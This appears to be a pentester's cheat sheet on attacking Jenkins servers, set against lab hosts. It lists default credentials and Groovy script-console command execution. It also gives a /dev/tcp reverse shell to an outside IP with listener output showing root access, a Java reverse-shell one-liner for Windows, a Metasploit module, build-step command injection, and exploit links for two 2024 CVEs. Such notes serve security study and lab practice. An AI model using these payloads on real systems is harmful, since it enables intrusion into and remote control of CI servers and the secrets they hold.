Jenkins

Discovery/Footprinting

Jenkins runs on Tomcat port 8080 by default. It also utilizes port 5000 to attach slave servers.

Enumeration

http://jenkins.inlanefreight.local:8000/configureSecurity/

http://jenkins.inlanefreight.local:8000/login?from=%2F

Default credentials such as admin:admin or does not have any type of authentication enabled. It is not uncommon to find Jenkins instances that do not require any authentication during an internal penetration test

Admin access - Script Console

Before 2.0: Admin access

http://jenkins_server/script

Groovy scripts could be executed: https://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html

Linux

http://jenkins.inlanefreight.local:8000/script

def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout

Windows

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");

Reverse Shell

Linux

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

$ nc -lvnp 8443

listening on [any] 8443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.201.58] 57844

id

uid=0(root) gid=0(root) groups=0(root)

/bin/bash -i

root@app02:/var/lib/jenkins3#

Metasploit

msf > use exploit/multi/http/jenkins_script_console

Windows

GitHub - Brzozova/reverse-shell-via-Jenkins: Gain Windows initial shell using Jenkins.GitHub

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

No admin access but could add or edit build steps

Script Execution and Privilege Escalation on Jenkins Server

Week of Continuous Intrusion Tools - Day 1 - Jenkins

Add a build step, add "Execute Windows Batch Command" and enter:

powershell -c command

CVE-2024-23897 - Arbitrary File Read Vulnerability Leading to RCE

GitHub - binganao/CVE-2024-23897GitHub

GitHub - h4x0r-dz/CVE-2024-23897: CVE-2024-23897GitHub

HTB: Builder0xdf hacks stuff

CVE-2024-43044 - Arbitrary file read that allows an agent to fetch files from the controller

GitHub - convisolabs/CVE-2024-43044-jenkins: Exploit for the vulnerability CVE-2024-43044 in JenkinsGitHub

Resources

HTB: Jeeves0xdf hacks stuff

Jenkins Penetration Testing - Hacking ArticlesHacking Articles

Jenkins SecurityHackTricks Cloud

Jenkins Pentesting | Exploit Noteshideckies